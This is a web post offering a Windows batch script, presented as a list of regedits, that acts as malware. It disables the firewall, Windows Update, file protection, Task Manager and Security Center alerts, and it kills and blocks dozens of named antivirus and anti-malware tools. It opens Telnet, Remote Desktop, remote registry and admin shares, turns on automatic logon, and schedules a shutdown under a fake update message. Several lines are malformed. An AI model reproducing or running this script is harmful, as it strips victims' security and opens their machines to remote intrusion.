Here is a list of regedits read the notes writin above them to understand what they do. fell free to edit it.
Setting Meaning
dword:00000002 Automatic
dword:00000003 Manual
dword:00000004 Disabled
CODE
@ECHO OFF
REM [akinova]
set e=echo
set k=tskill
set c=copy
set s=net stop
:::: Regedit Security ::::
:: Override Security Center ::
%e% REGEDIT4 > %tmp%\fir1.reg
%e% [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center] >> %tmp%\fir1.reg
%e% AntiVirusDisableNotify = "dword:00000001" >> %tmp%\fir1.reg
%e% FirewallDisableNotify = "dword:00000001" >> %tmp%\fir1.reg
%e% AntiVirusOverride = "dword:00000001" >> %tmp%\fir1.reg
%e% FirewallOverride = "dword:00000001" >> %tmp%\fir1.reg
%e% UpdatesDisableNotify = "dword:00000001" >> %tmp%\fir1.reg
START /WAIT REGEDIT /S "%tmp%\fir1.reg"
:: Disable the System’s Firewall for both the Domain and standard Profiles ::
%e% REGEDIT4 > fir2.reg
%e% [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile] >> %tmp%\fir2.reg
%e% "Start"="dword:00000000" >> fir2.reg
%e% HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile] >> %tmp%\fir2.reg
%e% EnableFirewall = "dword:00000000" >> %tmp%\fir2.reg
START /WAIT REGEDIT /S "%tmp%\fir2.reg"
:: Windows XP disables the automatic update for Service Pack 2 ::
%e% REGEDIT4 > %tmp%\fir3.reg
%e% HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate >> %tmp%\fir3.reg
%e% DoNotAllowXPSP2 = "dword:00000001" >> %tmp%\fir3.reg
START /WAIT REGEDIT /S "%tmp%\fir3.reg"
:: Disables built-in Firewall ::
%e% REGEDIT4 > %tmp%\fir4.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ALG] >> %tmp%\fir4.reg
%e% "Start"=dword:00000004 >> %tmp%\fir4.reg
START /WAIT REGEDIT /S "%tmp%\fir4.reg"
:: Disables applications to send error reports to Microsoft if/when they crash ::
%e% REGEDIT4 > %tmp%\fir5.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ERSvc] >> %tmp%\fir5.reg
%e% "Start"=dword:00000003 >> %tmp%\fir5.reg
START /WAIT REGEDIT /S "%tmp%\fir5.reg"
:: Disables the XP Built-in Help and Support Center to run ::
%e% REGEDIT4 > %tmp%\fir6.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\helpsvc] >> %tmp%\fir6.reg
%e% "Start"=dword:00000004 >> %tmp%\fir6.reg
START /WAIT REGEDIT /S "%tmp%\fir6.reg"
:: Disables the Microsoft Firewall ::
%e% REGEDIT4 > %tmp%\fir7.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ICFS] >> %tmp%\fir7.reg
%e% "Start"=dword:00000004 >> %tmp%\fir7.reg
START /WAIT REGEDIT /S "%tmp%\fir7.reg"
:: Disables ability to use the WindowsUpdate website ::
%e% REGEDIT4 > %tmp%\fir8.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv] >> %tmp%\fir8.reg
%e% "Start"=dword:00000004 >> %tmp%\fir8.reg
START /WAIT REGEDIT /S "%tmp%\fir8.reg"
:: Disable Firewall And Updates ::
%e% REGEDIT4 > %tmp%\fir9.reg >> %tmp%\fir9.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess] >> %tmp%\fir9.reg
%e% "Start"=dword:00000004 >> %tmp%\fir9.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv] >> %tmp%\fir9.reg
%e% "Start"=dword:00000004 >> %tmp%\fir9.reg
START /WAIT REGEDIT /S "%tmp%\fir9.reg"
:: Lowers the Internet Security (IE) settings ::
%e% REGEDIT4 > %tmp%\fir10.reg
%e% [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] >> %tmp%\fir10.reg
%e% 1206 = "0" >> %tmp%\fir10.reg
%e% 1806 = "0" >> %tmp%\fir10.reg
%e% 1807 = "0" >> %tmp%\fir10.reg
%e% 1808 = "0" >> %tmp%\fir10.reg
%e% 1809 = "3" >> %tmp%\fir10.reg
%e% 2000 = "0" >> %tmp%\fir10.reg
%e% 2001 = "0" >> %tmp%\fir10.reg
%e% 2004 = "0" >> %tmp%\fir10.reg
%e% 2100 = "0" >> %tmp%\fir10.reg
%e% 2101 = "1" >> %tmp%\fir10.reg
%e% 2102 = "0" >> %tmp%\fir10.reg
%e% 2200 = "0" >> %tmp%\fir10.reg
%e% 2201 = "0" >> %tmp%\fir10.reg
%e% 2300 = "1" >> %tmp%\fir10.reg
START /WAIT REGEDIT /S "%tmp%\fir10.reg"
:: Disable File Protection On Reboot ::
%e% REGEDIT4 > %tmp%\fir11.reg
%e% [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> %tmp%\fir11.reg
%e% "SFCDisable"=dword:FFFFFF9D >> %tmp%\fir11.reg
START /WAIT REGEDIT /S "%tmp%\fir5.reg"
:: Disable Task Manager ::
%e% REGEDIT4 > %tmp%\fir12.reg
%e% [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %tmp%\fir12.reg
%e% "DisableTaskMgr"=dword:00000001 >> %tmp%\fir12.reg
START /WAIT REGEDIT /S "%tmp%\fir12.reg"
:: kill list av's ::
%s% "NORTON"
%s% "Norton AntiVirus Server"
%s% "Norton Internet Security"
%s% "Norton Personal Firewall 2001"
%s% "Norton Personal Firewall 2002"
%s% "Norton Personal Firewall 2003"
%s% "Norton Personal Firewall 2004"
%s% "Norton Personal Firewall 2005"
%s% "Norton Personal Firewall 2006"
%s% "Norton Personal Firewall 2007"
%s% "Norton Personal Firewall 2008"
%s% "MCAFEE"
%s% "McAfee Network Agent"
%s% "McAfee Proxy Service"
%s% "McAfee Real-time Scanner"
%s% "McAfee Services"
%s% "McAfee SystemGuards"
%s% "McAfee Personal Firewall Service"
%s% "McAfee Firewall"
%s% "McAfee Internet Guard Dog Pro"
%s% "Moolive.exe"
%s% "Mpftray.exe"
%s% "Zonealarm"
%s% "Zonealarm.exe"
%s% "LOCKDOWN2000"
%s% "SAFEWEB"
%s% "WEBSCANX"
%s% "ANTIVIR"
%s% "LOCKDOWN2000"
%s% "Lockdown2000.exe"
%s% "Windows Firewall/Internet Connection Sharing (ICS)"
%s% "SiteAdvisor Service"
%s% "Security Center"
%s% "SharedAccess"
%k% NMain
%k% nod32
%k% AV*
%k% avcenter
%k% avconfig
%k% avscan
%k% avguard
%k% avgnt
%k% update
%k% preupd
%k% avcmd
%k% avesvc
%k% kav
%k% kavsvc
%k% kavsend
%k% keymanager
%k% agentsvr
%k% avgcc
%k% avgupsvc
%k% avgamsvr
%k% vsserv
%k% bdss
%k% xcommsvr
%k% bdnagent
%k% bdoesrv
%k% bdmcon
%k% bdswitch
%k% rtvr
%k% bdsubmit
%k% bdlite
%k% agentsvr
%k% tmproxy
%k% PcCtlCom
%k% pccguide
%k% qttask
%k% patch
%k% Tmntsrv
%k% PccPrm
%k% DrWebUpW
%k% spidernt
%k% DrWebScd
%k% DrWeb32w
%k% drwadins
%k% mcupdui
%k% McTskshd
%k% McAppIns
%k% mghtml
%k% McShield
%k% Mcdetect
%k% McVSEscn
%k% oasclnt
%k% mcvsshld
%k% ad-watch
%k% aluschedulersvc
%k% apvxdwin
%k% avciman
%k% avengine
%k% avp
%k% ca
%k% caissdt
%k% cavrid
%k% cavtray
%k% ccapp
%k% ccetvmgr
%k% ccproxy
%k% ccsetmgr
%k% dpasnt
%k% firewallntservice
%k% fsaw
%k% fsguidll
%k% fsm32
%k% fspex
%k% hsockpe
%k% isafe
%k% kav
%k% kavpf
%k% mcagent
%k% mcdetect
%k% mcshield
%k% mctskshd
%k% mcupdate
%k% mcupdmgr
%k% mcvsescn
%k% mcvsshld
%k% mpeng
%k% mpfagent
%k% mpfservice
%k% mpftray
%k% msascui
%k% mscifapp
%k% mscorsvw
%k% msfwsvc
%k% mskagent
%k% msksrvr
%k% msmpsvc
%k% msmsgs
%k% mxtask
%k% navapsvc
%k% nscsrvce
%k% oasclnt
%k% pavfnsvr
%k% pavprsrv
%k% pavsrv51
%k% pnmsrv
%k% psimsvc
%k% pskmssvc
%k% sdhelp
%k% sndsrvc
%k% spbbcsvc
%k% spysweeper
%k% spysweeperui
%k% srvload
%k% ssu
%k% swdoctor
%k% symlcsvc
%k% tpsrv
%k% tsantispy
%k% vir
%k% vrfwsvc
%k% vrmonnt
%k% vrmonsvc
%k% vsmon
%k% wdfdataservice
%k% webproxy
%k% webrootdesktopfirewall
%k% winssnotify
%k% wmiprvse
%k% zlclient
:::: Regedit Remote and Connection ::
:: Disables IPSEC capabilities (secure TCP/IP) ::
%e% REGEDIT4 > %tmp%\rc1.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PolicyAgent] >> %tmp%\rc1.reg
%e% "Start"=dword:00000004 >> %tmp%\rc1.reg
START /WAIT REGEDIT /S "%tmp%\fir1.reg"
:: Disables the computer to be aware of network connectivty interruptions ::
%e% REGEDIT4 > %tmp%\rc2.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS] >> %tmp%\rc2.reg
%e% "Start"=dword:00000004 >> %tmp%\rc2.reg
START /WAIT REGEDIT /S "%tmp%\rc2.reg"
:: Enable remote access ::
%e% REGEDIT4 > %tmp%\rc2.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess] >> %tmp%\rc2.reg
%e% "Start"=dword:00000001 >> %tmp%\rc2.reg
START /WAIT REGEDIT /S "%tmp%\rc2.reg"
:: Enable Shared access ::
%e% REGEDIT4 > %tmp%\rc3.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess] >> %tmp%\rc3.reg
%e% "Start"=dword:00000001 >> %tmp%\rc3.reg
START /WAIT REGEDIT /S "%tmp%\rc3.reg"
:: Enable administrative shares ::
%e% REGEDIT4 > %tmp%\rc4.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters] >> %tmp%\rc4.reg
%e% "AutoShareWks"=dword:00000001 >> %tmp%\rc4.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters] >> %tmp%\rc4.reg
%e% "SearchList"="sph.umich.edu,umich.edu,itd.umich.edu" >> %tmp%\rc4.reg
%e% "DisableDynamicUpdate"=dword:00000001 >> %tmp%\rc4.reg
START /WAIT REGEDIT /S "%tmp%\rc4.reg"
:: Allows for multiple users on a single machine without requiring you to log out ::
%e% REGEDIT4 > %tmp%\rc5.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FastUserSwitchingCompatibility] >> %tmp%\rc5.reg
%e% "Start"=dword:00000002 >> %tmp%\rc5.reg
START /WAIT REGEDIT /S "%tmp%\rc5.reg"
:: Allows remote access and control of the local computer ::
%e% REGEDIT4 > %tmp%\rc6.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RDSessMgr] >> %tmp%\rc6.reg
%e% "Start"=dword:00000002 >> %tmp%\rc6.reg
START /WAIT REGEDIT /S "%tmp%\rc6.reg"
:: Allows remote access and control of the Windows registry ::
%e% REGEDIT4 > %tmp%\rc7.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry] >> %tmp%\rc7.reg
%e% "Start"=dword:00000002 >> %tmp%\rc7.reg
START /WAIT REGEDIT /S "%tmp%\rc7.reg"
:: Enables Messenger Auto ::
%e% REGEDIT4 > %tmp%\rc8.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Messenger] >> %tmp%\rc8.reg
%e% "Start"=dword:00000002 >> %tmp%\rc8.reg
START /WAIT REGEDIT /S "%tmp%\rc8.reg"
:: Enables NetBIOS over TCP/IP (NetBT) services ::
%e% REGEDIT4 > %tmp%\rc9.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LmHosts] >> %tmp%\rc9.reg
%e% "Start"=dword:00000002 >> %tmp%\rc9.reg
START /WAIT REGEDIT /S "%tmp%\rc9.reg"
:: Allows you to resume file transfers on slow connections ::
%e% REGEDIT4 > %tmp%\rc10.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS] >> %tmp%\rc10.reg
%e% "Start"=dword:00000002 >> %tmp%\rc10.reg
START /WAIT REGEDIT /S "%tmp%\rc10.reg"
:: Enable Telnet As Server ::
%e% REGEDIT4 > %tmp%\rc11.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr] >> %tmp%\rc11.reg
%e% "ErrorControl"=dword:00000001 >> %tmp%\rc11.reg
%e% "Start"=dword:00000002 >> %tmp%\rc11.reg
%e% "Type"=dword:00000010 >> %tmp%\rc11.reg
>> "%tmp%\rc11.reg" %e% "FailureActions"=hex&
#58;00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,38,65,11,00,01,00,00,00,60,e
a,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] >> %tmp%\rc11.reg
%e% >>"%Temp%.\tel.reg" ECHO "NTLM"=dword:00000001 >> %tmp%\rc11.reg
%e% >>"%Temp%.\tel.reg" ECHO "TelnetPort"=dword:0000ffff >> %tmp%\rc11.reg
START /WAIT REGEDIT /S "%tmp%\rc11.reg"
DEL "%tmp%\rc11.reg"
:: Enable TermSercvice ::
%e% Windows Registry Editor Version 5.00 > %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> %tmp%\rc12.reg
%e% "fDenyTSConnections"=dword:00000000 >> %tmp%\rc12.reg
%e% "fAllowToGetHelp"=dword:00000001 >> %tmp%\rc12.reg
regedit /s %tmp%\rc12.reg
del %tmp%\rc12.reg
%e% Windows Registry Editor Version 5.00 > %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >> %tmp%\rc12.reg
%e% "Start"=dword:00000002 >> %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> %tmp%\rc12.reg
%e% "AllowTSConnections"=dword:00000001 >> %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> %tmp%\rc12.reg
%e% "fDenyTSConnections"=dword:00000000 >> %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> %tmp%\rc12.reg
%e% "fAllowToGetHelp"=dword:00000001 >> %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> %tmp%\rc12.reg
%e% "AllowMultipleTSSessions"=dword:00000001 >> %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> %tmp%\rc12.reg
%e% "AutoAdminLogon"="1" >> %tmp%\rc12.reg
REGEDIT /S %tmp%\rc12.reg
REGEDIT -S %tmp%\rc12.reg
%e% [Components] > c:\bootlog~.txt
%e% TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
DEL c:\bootlog~.txt
:: RemoteDesktop Enable on WinXP ::
%e% REGEDIT4 > %tmp%\rc13.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> %tmp%\rc13.reg
%e% "fDenyTSConnections"=dword:00000000 >> %tmp%\rc13.reg
%e% "fAllowToGetHelp"=dword:00000001 >> %tmp%\rc13.reg
START /WAIT REGEDIT /S "%tmp%\rc13.reg"
:: Create A Disallow Executables List :: Gets detected as harmfull reg but i have alredy disabled message and av ::
%e% REGEDIT4 > %Tmp%\diss.reg
%e% [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %Tmp%\diss.reg
%e% "DisallowRun"=dword:00000001 >> %Tmp%\diss.reg >> %Tmp%\diss.reg
START /WAIT REGEDIT /S "%Tmp%\diss.reg"
DEL "%Tmp%\diss.reg"
:: Add Executables To Be Blocked From Running ::
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer\DisallowRun]
%e% "0"="lockdown.exe" >> %Tmp%\diss2.reg
%e% "1"="lockdown2000.exe" >> %Tmp%\diss2.reg
%e% "2"="zonealarm.exe" >> %Tmp%\diss2.reg
%e% "3"="NMain.exe" >> %Tmp%\diss2.reg
%e% "4"="AV*.exe" >> %Tmp%\diss2.reg
%e% "5"="nod32.exe" >> %Tmp%\diss2.reg
%e% "6"="Avcenter.exe" >> %Tmp%\diss2.reg
%e% "7"="SUPERAntiSpyware.exe" >> %Tmp%\diss2.reg
%e% "8"="Hijackthis.exe" >> %Tmp%\diss2.reg
%e% "9"="SiteAdv.exe" >> %Tmp%\diss2.reg
%e% "10"="Mcshield.exe" >> %Tmp%\diss2.reg
%e% "11"="Mcproxy.exe" >> %Tmp%\diss2.reg
%e% "12"="combofix.exe" >> %Tmp%\diss2.reg
%e% "13"="Mcdetect.exe" >> %Tmp%\diss2.reg
%e% "14"="avguard.exe" >> %Tmp%\diss2.reg
%e% "15"="avgnt.exe" >> %Tmp%\diss2.reg
%e% "16"="kav.exe" >> %Tmp%\diss2.reg
%e% "17"="kavsvc.exe" >> %Tmp%\diss2.reg
%e% "18"="kavsend.exe" >> %Tmp%\diss2.reg
%e% "19"="agentsvr.exe" >> %Tmp%\diss2.reg
%e% "20"="mcvsshld.exe" >> %Tmp%\diss2.reg
%e% "21"="OTscan.exe" >> %Tmp%\diss2.reg
%e% "22"="OTscanit.exe" >> %Tmp%\diss2.reg
%e% "23"="avsynmgr.exe" >> %Tmp%\diss2.reg
%e% "24"="avosynmgr.exe" >> %Tmp%\diss2.reg
%e% "25"="mcvsescn.exe" >> %Tmp%\diss2.reg
%e% "26"="mctskshd.exe" >> %Tmp%\diss2.reg
%e% "27"="MCUpdate.exe" >> %Tmp%\diss2.reg
%e% "38"="McAgent.exe" >> %Tmp%\diss2.reg
%e% "39"="McVsRte.exe" >> %Tmp%\diss2.reg
%e% "30"="McRegWiz.exe" >> %Tmp%\diss2.reg
%e% "31"="ccapp.exe" >> %Tmp%\diss2.reg
START /WAIT REGEDIT /S "%Temp%\diss2.reg"
:: Delete Used Registry Files ::
del %tmp%\fir1.reg
del %tmp%\fir2.reg
del %tmp%\fir3.reg
del %tmp%\fir4.reg
del %tmp%\fir5.reg
del %tmp%\fir6.reg
del %tmp%\fir7.reg
del %tmp%\fir8.reg
del %tmp%\fir9.reg
del %tmp%\fir10.reg
del %tmp%\fir11.reg
del %tmp%\fir12.reg
del %tmp%\rc1.reg
del %tmp%\rc2.reg
del %tmp%\rc3.reg
del %tmp%\rc4.reg
del %tmp%\rc5.reg
del %tmp%\rc6.reg
del %tmp%\rc7.reg
del %tmp%\rc8.reg
del %tmp%\rc9.reg
del %tmp%\rc10.reg
del %tmp%\rc11.reg
del %tmp%\rc12.reg
del %tmp%\rc13.reg
del %tmp%\diss2.reg
:: Shutdown pc AT 12:00AM to refresh updated system registry ::
AT 12:00AM Shutdown -s -t 5 -c "System Must Be Rebooted For Full Installation Of Updates"
ليست هناك تعليقات:
إرسال تعليق